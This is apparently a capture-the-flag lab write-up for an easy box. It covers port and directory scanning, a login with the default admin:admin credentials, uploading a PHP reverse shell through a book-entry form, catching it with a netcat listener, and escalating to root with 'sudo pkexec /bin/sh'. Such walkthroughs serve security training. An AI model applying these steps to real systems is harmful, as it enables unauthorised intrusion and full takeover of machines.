RATING
Easy
ENUMERATION
First, we kick it off with our usual nmap scan for these types of boxes:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.207.111
We can see that port 80 is open and navigating to it from a browser reveals only a default Apache2 page. So, we proceed with a directory bruteforce using feroxbuster:
Command: feroxbuster -u http://192.168.207.111/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200
Normally we’d include 301 and 302 redirects in our scans, but it wasn’t really necessary here.
EXPLOITATION
We navigate to the /admin directory and discover a login portal. We try out some default passwords and SQL injection, but no go.
Navigating to /store, however, reveals another admin login portal:
Here, we try out our usual default passwords and are successful with admin:admin:
Once logged in, we can see there is a way to add a new book entry:
We see an upload form and immediately think of file upload vulnerability:
With our test run, we receive an error for publisherid. It seems that we cannot use a random value here:
We navigate over to the list of publishers and choose one:
We try again with publisher Wrox and include an upload of our php reverse shell (don’t forget to edit IP and port details):
And we have a successful upload:
We start a netcat listener and navigate over to http://192.168.207.111/store/books.php and catch our shell:
Command: nc -nvlp 1234
PRIVILEGE ESCALATION
Hopping over to /home/tony, we discover a password.txt file. Taking a look inside this file, we see a password for ssh:
We know this target has port 22 open and running ssh, so we ssh as user tony with our newly discovered password.
We are able to successfully log in as tony and upon running sudo -l, we see that he can run pkexec as root:
Command: ssh [email protected]
Command: sudo -l
Taking a look at gtfobins, we see that we can use this to drop into a root shell:
Command: sudo pkexec /bin/sh
And… we are root and have our flag.